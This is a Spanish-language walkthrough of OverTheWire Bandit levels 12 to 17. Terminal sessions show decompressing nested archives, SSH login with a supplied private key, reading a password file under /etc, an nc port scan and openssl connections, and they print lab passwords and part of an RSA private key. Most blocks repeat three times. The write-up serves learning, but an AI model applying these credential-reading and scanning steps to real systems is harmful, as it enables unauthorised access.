Nivel 12 -> Nivel 13
En este nivel nis dan un fichero data.txt el cual es un dumpeado de un fichero el cual ha sido comprimido repetidas veces. Pa resolver este nivel tenemos que pasar data.txt a formato binario mediante xxd y mediante el comando file obtener información sobre el fichero e ir aplicando las descompresiones correspondientes.
bandit12@bandit:~$ mkdir /tmp/an
bandit12@bandit:~$ cp data.txt /tmp/an
bandit12@bandit:~$ cd /tmp/an
bandit12@bandit:/tmp/an$ xxd -r data.txt > data1
bandit12@bandit:/tmp/an$ ls
data.txt data1
bandit12@bandit:/tmp/an$ file data1
data1: gzip compressed data, was "data2.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data1 c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ ls
c data.txt
bandit12@bandit:/tmp/an$ file c
c: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ bzip2 -d c
bandit12@bandit:/tmp/an$ file c.out
c.out: gzip compressed data, was "data4.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv c.out c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ file c
c: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv c c.tar
bandit12@bandit:/tmp/an$ tar x c.tar
tar: Refusing to read archive contents from terminal (missing -f option?)
tar: Error is not recoverable: exiting now
bandit12@bandit:/tmp/an$ tar fx c.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.bin
bandit12@bandit:/tmp/an$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data5.bin data5.tar
bandit12@bandit:/tmp/an$ tar xf data5.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.bin
bandit12@bandit:/tmp/an$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ mv data6.bin data6.bzip
bandit12@bandit:/tmp/an$ bzip2 -d data6.bzip
bzip2: Can't guess original name for data6.bzip -- using data6.bzip.out
bandit12@bandit:/tmp/an$ file data6.bzip.out
data6.bzip.out: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data6.bzip.out data6.tar
bandit12@bandit:/tmp/an$ tar xf data6.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8.bin
bandit12@bandit:/tmp/an$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data8.bin data8.gz
bandit12@bandit:/tmp/an$ gzip -d data8.gz
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8
bandit12@bandit:/tmp/an$ file data8
data8: ASCII text
bandit12@bandit:/tmp/an$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
- bandit12@bandit:~$ mkdir /tmp/an
- bandit12@bandit:~$ cp data.txt /tmp/an
- bandit12@bandit:~$ cd /tmp/an
- bandit12@bandit:/tmp/an$ xxd -r data.txt > data1
- bandit12@bandit:/tmp/an$ ls
- data.txt data1
- bandit12@bandit:/tmp/an$ file data1
- data1: gzip compressed data, was "data2.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
- bandit12@bandit:/tmp/an$ mv data1 c.gz
- bandit12@bandit:/tmp/an$ gzip -d c.gz
- bandit12@bandit:/tmp/an$ ls
- c data.txt
- bandit12@bandit:/tmp/an$ file c
- c: bzip2 compressed data, block size = 900k
- bandit12@bandit:/tmp/an$ bzip2 -d c
- bandit12@bandit:/tmp/an$ file c.out
- c.out: gzip compressed data, was "data4.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
- bandit12@bandit:/tmp/an$ mv c.out c.gz
- bandit12@bandit:/tmp/an$ gzip -d c.gz
- bandit12@bandit:/tmp/an$ file c
- c: POSIX tar archive (GNU)
- bandit12@bandit:/tmp/an$ mv c c.tar
- bandit12@bandit:/tmp/an$ tar x c.tar
- tar: Refusing to read archive contents from terminal (missing -f option?)
- tar: Error is not recoverable: exiting now
- bandit12@bandit:/tmp/an$ tar fx c.tar
- bandit12@bandit:/tmp/an$ ls
- c.tar data.txt data5.bin
- bandit12@bandit:/tmp/an$ file data5.bin
- data5.bin: POSIX tar archive (GNU)
- bandit12@bandit:/tmp/an$ mv data5.bin data5.tar
- bandit12@bandit:/tmp/an$ tar xf data5.tar
- bandit12@bandit:/tmp/an$ ls
- c.tar data.txt data5.tar data6.bin
- bandit12@bandit:/tmp/an$ file data6.bin
- data6.bin: bzip2 compressed data, block size = 900k
- bandit12@bandit:/tmp/an$ mv data6.bin data6.bzip
- bandit12@bandit:/tmp/an$ bzip2 -d data6.bzip
- bzip2: Can't guess original name for data6.bzip -- using data6.bzip.out
- bandit12@bandit:/tmp/an$ file data6.bzip.out
- data6.bzip.out: POSIX tar archive (GNU)
- bandit12@bandit:/tmp/an$ mv data6.bzip.out data6.tar
- bandit12@bandit:/tmp/an$ tar xf data6.tar
- bandit12@bandit:/tmp/an$ ls
- c.tar data.txt data5.tar data6.tar data8.bin
- bandit12@bandit:/tmp/an$ file data8.bin
- data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
- bandit12@bandit:/tmp/an$ mv data8.bin data8.gz
- bandit12@bandit:/tmp/an$ gzip -d data8.gz
- bandit12@bandit:/tmp/an$ ls
- c.tar data.txt data5.tar data6.tar data8
- bandit12@bandit:/tmp/an$ file data8
- data8: ASCII text
- bandit12@bandit:/tmp/an$ cat data8
- The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
bandit12@bandit:~$ mkdir /tmp/an
bandit12@bandit:~$ cp data.txt /tmp/an
bandit12@bandit:~$ cd /tmp/an
bandit12@bandit:/tmp/an$ xxd -r data.txt > data1
bandit12@bandit:/tmp/an$ ls
data.txt data1
bandit12@bandit:/tmp/an$ file data1
data1: gzip compressed data, was "data2.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data1 c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ ls
c data.txt
bandit12@bandit:/tmp/an$ file c
c: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ bzip2 -d c
bandit12@bandit:/tmp/an$ file c.out
c.out: gzip compressed data, was "data4.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv c.out c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ file c
c: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv c c.tar
bandit12@bandit:/tmp/an$ tar x c.tar
tar: Refusing to read archive contents from terminal (missing -f option?)
tar: Error is not recoverable: exiting now
bandit12@bandit:/tmp/an$ tar fx c.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.bin
bandit12@bandit:/tmp/an$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data5.bin data5.tar
bandit12@bandit:/tmp/an$ tar xf data5.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.bin
bandit12@bandit:/tmp/an$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ mv data6.bin data6.bzip
bandit12@bandit:/tmp/an$ bzip2 -d data6.bzip
bzip2: Can't guess original name for data6.bzip -- using data6.bzip.out
bandit12@bandit:/tmp/an$ file data6.bzip.out
data6.bzip.out: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data6.bzip.out data6.tar
bandit12@bandit:/tmp/an$ tar xf data6.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8.bin
bandit12@bandit:/tmp/an$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data8.bin data8.gz
bandit12@bandit:/tmp/an$ gzip -d data8.gz
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8
bandit12@bandit:/tmp/an$ file data8
data8: ASCII text
bandit12@bandit:/tmp/an$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
Nivel 13 -> Nivel 14
En este nivel nos dice que la bandera se encuentra en /etc/bandit_pass/bandit14 pero solo puede ser leido por el usuarios bandit14 y para ello nos facilitan una clave privada ssh que debemos usar para poder acceder a la contrasña.
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
Could not create directory '/home/bandit13/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
- bandit13@bandit:~$ ls
- sshkey.private
- bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
- Could not create directory '/home/bandit13/.ssh'.
- The authenticity of host 'localhost (127.0.0.1)' can't be established.
- ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
- Are you sure you want to continue connecting (yes/no)? yes
- Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
- bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
- 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
Could not create directory '/home/bandit13/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Nivel 14 -> Nivel 15
En este nivel se indica que la contraseña para el siguiente nivel puede ser obtenida si enviamos al puerto 30000 de localhost la contraseña del nuvel actual.
bandit14@bandit:~$ telnet localhost 30000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Connection closed by foreign host.
- bandit14@bandit:~$ telnet localhost 30000
- Trying ::1...
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
- Correct!
- BfMYroe26WYalil77FoDi9qh59eK5xNr
- Connection closed by foreign host.
bandit14@bandit:~$ telnet localhost 30000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Connection closed by foreign host.
Nivel 15 -> Nivel 16
Este nivel es parecido al anterior, se nos pide que enviemos la clave actual al puerto 30001 en localhost pero con la diferencia de que tenemos que hacerlo mediante un canal encriptado.
bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = bandit
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = bandit
verify return:1
---
Certificate chain
0 s:/CN=bandit
i:/CN=bandit
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICsjCCAZqgAwIBAgIJAKZI1xYeoXFuMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
BAMMBmJhbmRpdDAeFw0xNzEyMjgxMzIzNDBaFw0yNzEyMjYxMzIzNDBaMBExDzAN
BgNVBAMMBmJhbmRpdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOcX
ruVcnQUBeHJeNpSYayQExCJmcHzSCktnOnF/H4efWzxvLRWt5z4gYaKvTC9ixLrb
K7a255GEaUbP/NVFpB/sn56uJc1ijz8u0hWQ3DwVe5ZrHUkNzAuvC2OeQgh2HanV
5LwB1nmRZn90PG1puKxktMjXsGY7f9Yvx1/yVnZqu2Ev2uDA0RXij/T+hEqgDMI7
y4ZFmuYD8z4b2kAUwj7RHh9LUKXKQlO+Pn8hchdR/4IK+Xc4+GFOin0XdQdUJaBD
8quOUma424ejF5aB6QCSE82MmHlLBO2tzC9yKv8L8w+fUeQFECH1WfPC56GcAq3U
IvgdjGrU/7EKN5XkONcCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
AAOCAQEAnrOty7WAOpDGhuu0V8FqPoKNwFrqGuQCTeqhQ9LP0bFNhuH34pZ0JFsH
L+Y/q4Um7+66mNJUFpMDykm51xLY2Y4oDNCzugy+fm5Q0EWKRwrq+hIM+5hs0RdC
nARP+719ddmUiXF7r7IVP2gK+xqpa8+YcYnLuoXEtpKkrrQCCUiqabltU5yRMR77
3wqB54txrB4IhwnXqpO23kTuRNrkG+JqDUkaVpvct+FAdT3PODMONP/oHII3SH9i
ar/rI9k+4hjlg4NqOoduxX9M+iLJ0Zgj6HAg3EQVn4NHsgmuTgmknbhqTU3o4IwB
XFnxdxVy0ImGYtvmnZDQCGivDok6jA==
-----END CERTIFICATE-----
subject=/CN=bandit
issuer=/CN=bandit
---
No client certificate CA names sent
---
SSL handshake has read 1015 bytes and written 631 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 390D38ED94122F6FD7F9B68BD31EB1043DB14D5D24F9DEB823AAD3D4B970E546
Session-ID-ctx:
Master-Key: 3F4FFA74A9CF8627193150E8708AD0E42E97873854682EAF00585A669DC4D1BA8992C051D40063B299F25086F9D760AE
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 08 f0 15 a5 d6 6f a0 e8-06 d6 bb a4 0c 33 eb 04 .....o.......3..
0010 - b1 4a 10 2e 1d 99 ff 39-10 5c 43 5f 20 15 08 4a .J.....9.\C_ ..J
0020 - d1 17 17 9f 9a 10 d6 31-7f 19 9d 0b 1d 6f ce ed .......1.....o..
0030 - 34 4b 63 f4 3d 8e 56 98-73 ce ca 2c a6 34 6f 86 4Kc.=.V.s..,.4o.
0040 - 68 27 77 b6 9e 6d f6 f2-74 f5 d7 31 1a b0 a2 c6 h'w..m..t..1....
0050 - 58 98 0e 37 ae d1 65 e1-9c ee b8 01 61 22 ba 94 X..7..e.....a"..
0060 - 6f f1 9c 36 e6 e5 1c 63-74 1b 6d 44 65 20 a3 35 o..6...ct.mDe .5
0070 - 8b fc 33 7d a0 af 3c a6-36 84 c4 b8 b5 92 d6 bd ..3}..<.6.......
0080 - a3 23 ff a9 e3 81 b9 7d-1f 6b 8b 6c 2b 80 c2 65 .#.....}.k.l+..e
0090 - b4 67 ed 1a b5 6b 2e 86-8e ef 37 38 b5 47 35 5f .g...k....78.G5_
Start Time: 1534092520
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
closed- bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
- CONNECTED(00000003)
- depth=0 CN = bandit
- verify error:num=18:self signed certificate
- verify return:1
- depth=0 CN = bandit
- verify return:1
- ---
- Certificate chain
- 0 s:/CN=bandit
- i:/CN=bandit
- ---
- Server certificate
- -----BEGIN CERTIFICATE-----
- MIICsjCCAZqgAwIBAgIJAKZI1xYeoXFuMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
- BAMMBmJhbmRpdDAeFw0xNzEyMjgxMzIzNDBaFw0yNzEyMjYxMzIzNDBaMBExDzAN
- BgNVBAMMBmJhbmRpdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOcX
- ruVcnQUBeHJeNpSYayQExCJmcHzSCktnOnF/H4efWzxvLRWt5z4gYaKvTC9ixLrb
- K7a255GEaUbP/NVFpB/sn56uJc1ijz8u0hWQ3DwVe5ZrHUkNzAuvC2OeQgh2HanV
- 5LwB1nmRZn90PG1puKxktMjXsGY7f9Yvx1/yVnZqu2Ev2uDA0RXij/T+hEqgDMI7
- y4ZFmuYD8z4b2kAUwj7RHh9LUKXKQlO+Pn8hchdR/4IK+Xc4+GFOin0XdQdUJaBD
- 8quOUma424ejF5aB6QCSE82MmHlLBO2tzC9yKv8L8w+fUeQFECH1WfPC56GcAq3U
- IvgdjGrU/7EKN5XkONcCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
- AAOCAQEAnrOty7WAOpDGhuu0V8FqPoKNwFrqGuQCTeqhQ9LP0bFNhuH34pZ0JFsH
- L+Y/q4Um7+66mNJUFpMDykm51xLY2Y4oDNCzugy+fm5Q0EWKRwrq+hIM+5hs0RdC
- nARP+719ddmUiXF7r7IVP2gK+xqpa8+YcYnLuoXEtpKkrrQCCUiqabltU5yRMR77
- 3wqB54txrB4IhwnXqpO23kTuRNrkG+JqDUkaVpvct+FAdT3PODMONP/oHII3SH9i
- ar/rI9k+4hjlg4NqOoduxX9M+iLJ0Zgj6HAg3EQVn4NHsgmuTgmknbhqTU3o4IwB
- XFnxdxVy0ImGYtvmnZDQCGivDok6jA==
- -----END CERTIFICATE-----
- subject=/CN=bandit
- issuer=/CN=bandit
- ---
- No client certificate CA names sent
- ---
- SSL handshake has read 1015 bytes and written 631 bytes
- ---
- New, TLSv1/SSLv3, Cipher is AES128-SHA
- Server public key is 2048 bit
- Secure Renegotiation IS supported
- Compression: NONE
- Expansion: NONE
- No ALPN negotiated
- SSL-Session:
- Protocol : TLSv1
- Cipher : AES128-SHA
- Session-ID: 390D38ED94122F6FD7F9B68BD31EB1043DB14D5D24F9DEB823AAD3D4B970E546
- Session-ID-ctx:
- Master-Key: 3F4FFA74A9CF8627193150E8708AD0E42E97873854682EAF00585A669DC4D1BA8992C051D40063B299F25086F9D760AE
- Key-Arg : None
- PSK identity: None
- PSK identity hint: None
- SRP username: None
- TLS session ticket lifetime hint: 7200 (seconds)
- TLS session ticket:
- 0000 - 08 f0 15 a5 d6 6f a0 e8-06 d6 bb a4 0c 33 eb 04 .....o.......3..
- 0010 - b1 4a 10 2e 1d 99 ff 39-10 5c 43 5f 20 15 08 4a .J.....9.\C_ ..J
- 0020 - d1 17 17 9f 9a 10 d6 31-7f 19 9d 0b 1d 6f ce ed .......1.....o..
- 0030 - 34 4b 63 f4 3d 8e 56 98-73 ce ca 2c a6 34 6f 86 4Kc.=.V.s..,.4o.
- 0040 - 68 27 77 b6 9e 6d f6 f2-74 f5 d7 31 1a b0 a2 c6 h'w..m..t..1....
- 0050 - 58 98 0e 37 ae d1 65 e1-9c ee b8 01 61 22 ba 94 X..7..e.....a"..
- 0060 - 6f f1 9c 36 e6 e5 1c 63-74 1b 6d 44 65 20 a3 35 o..6...ct.mDe .5
- 0070 - 8b fc 33 7d a0 af 3c a6-36 84 c4 b8 b5 92 d6 bd ..3}..<.6.......
- 0080 - a3 23 ff a9 e3 81 b9 7d-1f 6b 8b 6c 2b 80 c2 65 .#.....}.k.l+..e
- 0090 - b4 67 ed 1a b5 6b 2e 86-8e ef 37 38 b5 47 35 5f .g...k....78.G5_
- Start Time: 1534092520
- Timeout : 300 (sec)
- Verify return code: 18 (self signed certificate)
- ---
- BfMYroe26WYalil77FoDi9qh59eK5xNr
- Correct!
- cluFn7wTiGryunymYOu4RcffSxQluehd
- closed
bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = bandit
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = bandit
verify return:1
---
Certificate chain
0 s:/CN=bandit
i:/CN=bandit
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICsjCCAZqgAwIBAgIJAKZI1xYeoXFuMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
BAMMBmJhbmRpdDAeFw0xNzEyMjgxMzIzNDBaFw0yNzEyMjYxMzIzNDBaMBExDzAN
BgNVBAMMBmJhbmRpdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOcX
ruVcnQUBeHJeNpSYayQExCJmcHzSCktnOnF/H4efWzxvLRWt5z4gYaKvTC9ixLrb
K7a255GEaUbP/NVFpB/sn56uJc1ijz8u0hWQ3DwVe5ZrHUkNzAuvC2OeQgh2HanV
5LwB1nmRZn90PG1puKxktMjXsGY7f9Yvx1/yVnZqu2Ev2uDA0RXij/T+hEqgDMI7
y4ZFmuYD8z4b2kAUwj7RHh9LUKXKQlO+Pn8hchdR/4IK+Xc4+GFOin0XdQdUJaBD
8quOUma424ejF5aB6QCSE82MmHlLBO2tzC9yKv8L8w+fUeQFECH1WfPC56GcAq3U
IvgdjGrU/7EKN5XkONcCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
AAOCAQEAnrOty7WAOpDGhuu0V8FqPoKNwFrqGuQCTeqhQ9LP0bFNhuH34pZ0JFsH
L+Y/q4Um7+66mNJUFpMDykm51xLY2Y4oDNCzugy+fm5Q0EWKRwrq+hIM+5hs0RdC
nARP+719ddmUiXF7r7IVP2gK+xqpa8+YcYnLuoXEtpKkrrQCCUiqabltU5yRMR77
3wqB54txrB4IhwnXqpO23kTuRNrkG+JqDUkaVpvct+FAdT3PODMONP/oHII3SH9i
ar/rI9k+4hjlg4NqOoduxX9M+iLJ0Zgj6HAg3EQVn4NHsgmuTgmknbhqTU3o4IwB
XFnxdxVy0ImGYtvmnZDQCGivDok6jA==
-----END CERTIFICATE-----
subject=/CN=bandit
issuer=/CN=bandit
---
No client certificate CA names sent
---
SSL handshake has read 1015 bytes and written 631 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 390D38ED94122F6FD7F9B68BD31EB1043DB14D5D24F9DEB823AAD3D4B970E546
Session-ID-ctx:
Master-Key: 3F4FFA74A9CF8627193150E8708AD0E42E97873854682EAF00585A669DC4D1BA8992C051D40063B299F25086F9D760AE
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 08 f0 15 a5 d6 6f a0 e8-06 d6 bb a4 0c 33 eb 04 .....o.......3..
0010 - b1 4a 10 2e 1d 99 ff 39-10 5c 43 5f 20 15 08 4a .J.....9.\C_ ..J
0020 - d1 17 17 9f 9a 10 d6 31-7f 19 9d 0b 1d 6f ce ed .......1.....o..
0030 - 34 4b 63 f4 3d 8e 56 98-73 ce ca 2c a6 34 6f 86 4Kc.=.V.s..,.4o.
0040 - 68 27 77 b6 9e 6d f6 f2-74 f5 d7 31 1a b0 a2 c6 h'w..m..t..1....
0050 - 58 98 0e 37 ae d1 65 e1-9c ee b8 01 61 22 ba 94 X..7..e.....a"..
0060 - 6f f1 9c 36 e6 e5 1c 63-74 1b 6d 44 65 20 a3 35 o..6...ct.mDe .5
0070 - 8b fc 33 7d a0 af 3c a6-36 84 c4 b8 b5 92 d6 bd ..3}..<.6.......
0080 - a3 23 ff a9 e3 81 b9 7d-1f 6b 8b 6c 2b 80 c2 65 .#.....}.k.l+..e
0090 - b4 67 ed 1a b5 6b 2e 86-8e ef 37 38 b5 47 35 5f .g...k....78.G5_
Start Time: 1534092520
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
closedNivel 16 -> Nivel 17
Este nivel vuelve a ser muy parecido a los anteriores, pero con la diferencia de que hay multiples servidores escuchando en puertos que van desde el 31ooo al 32000. Para solucionarlo podemos usar nc para saber cuales son los que están abiertos y como son pocos probar uno a uno.
bandit16@bandit:~$ mkdir /tmp/ang/hola
bandit16@bandit:~$ nc -zv localhost 31000-32000 2> /tmp/ang/hola
bandit16@bandit:~$ cat /tmp/ang/hola | grep suc
Connection to localhost 31046 port [tcp/*] succeeded!
Connection to localhost 31518 port [tcp/*] succeeded!
Connection to localhost 31691 port [tcp/*] succeeded!
Connection to localhost 31790 port [tcp/*] succeeded!
Connection to localhost 31960 port [tcp/*] succeeded!
bandit16@bandit:~$ openssl s_client -connect localhost:31790 -ign_eof
CONNECTED(00000003)
depth=0 CN = bandit
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = bandit
verify return:1
---
Certificate chain
0 s:/CN=bandit
i:/CN=bandit
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICsjCCAZqgAwIBAgIJAKZI1xYeoXFuMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
BAMMBmJhbmRpdDAeFw0xNzEyMjgxMzIzNDBaFw0yNzEyMjYxMzIzNDBaMBExDzAN
BgNVBAMMBmJhbmRpdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOcX
ruVcnQUBeHJeNpSYayQExCJmcHzSCktnOnF/H4efWzxvLRWt5z4gYaKvTC9ixLrb
K7a255GEaUbP/NVFpB/sn56uJc1ijz8u0hWQ3DwVe5ZrHUkNzAuvC2OeQgh2HanV
5LwB1nmRZn90PG1puKxktMjXsGY7f9Yvx1/yVnZqu2Ev2uDA0RXij/T+hEqgDMI7
y4ZFmuYD8z4b2kAUwj7RHh9LUKXKQlO+Pn8hchdR/4IK+Xc4+GFOin0XdQdUJaBD
8quOUma424ejF5aB6QCSE82MmHlLBO2tzC9yKv8L8w+fUeQFECH1WfPC56GcAq3U
IvgdjGrU/7EKN5XkONcCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
AAOCAQEAnrOty7WAOpDGhuu0V8FqPoKNwFrqGuQCTeqhQ9LP0bFNhuH34pZ0JFsH
L+Y/q4Um7+66mNJUFpMDykm51xLY2Y4oDNCzugy+fm5Q0EWKRwrq+hIM+5hs0RdC
nARP+719ddmUiXF7r7IVP2gK+xqpa8+YcYnLuoXEtpKkrrQCCUiqabltU5yRMR77
3wqB54txrB4IhwnXqpO23kTuRNrkG+JqDUkaVpvct+FAdT3PODMONP/oHII3SH9i
ar/rI9k+4hjlg4NqOoduxX9M+iLJ0Zgj6HAg3EQVn4NHsgmuTgmknbhqTU3o4IwB
XFnxdxVy0ImGYtvmnZDQCGivDok6jA==
-----END CERTIFICATE-----
subject=/CN=bandit
issuer=/CN=bandit
---
No client certificate CA names sent
---
SSL handshake has read 1015 bytes and written 631 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 06DABAB6C4656E9FC34A5F6ED53A0865A49857C66A73BFBAA740F3EB2208B805
Session-ID-ctx:
Master-Key: F1E42EEC279D5777BA24D8870F643F51DD8661008DC05F87E6FA0CDACDE2E9CEB5D170044269AC96A949246730235B36
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - aa 3d 08 f7 55 9a 83 cb-75 cb f1 ae ef 7b e3 4c .=..U...u....{.L
0010 - 3c 2a b3 78 e8 49 43 1b-d5 b3 ef 50 a8 26 79 cb <*.x.IC....P.&y.
0020 - 52 aa 50 0b 04 e1 14 28-35 24 25 63 70 d4 aa 54 R.P....(5$%cp..T
0030 - da ab 09 82 19 45 b6 ef-31 9f 91 27 df 93 5c 8c .....E..1..'..\.
0040 - fb f8 67 c1 47 52 20 11-94 19 f2 bc 66 25 9e 23 ..g.GR .....f%.#
0050 - 60 3c b6 e9 53 7e 34 78-e9 24 46 74 90 eb 4f a4 `<..S~4x.$Ft..O.
0060 - 75 75 46 9a dd bb 69 10-cc e9 30 14 91 2b d9 8f uuF...i...0..+..
0070 - 0a 81 6e 27 11 d4 c3 fe-88 c8 93 55 f7 ee 9a e6 ..n'.......U....
0080 - 1a 06 83 30 72 c7 17 cf-1a 3e b8 fa 1f e3 ae 5d ...0r....>.....]
0090 - 87 93 9b 0e 3a d0 da a8-50 4d e7 63 5b 50 ff d2 ....:...PM.c[P..
Start Time: 1534093610
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
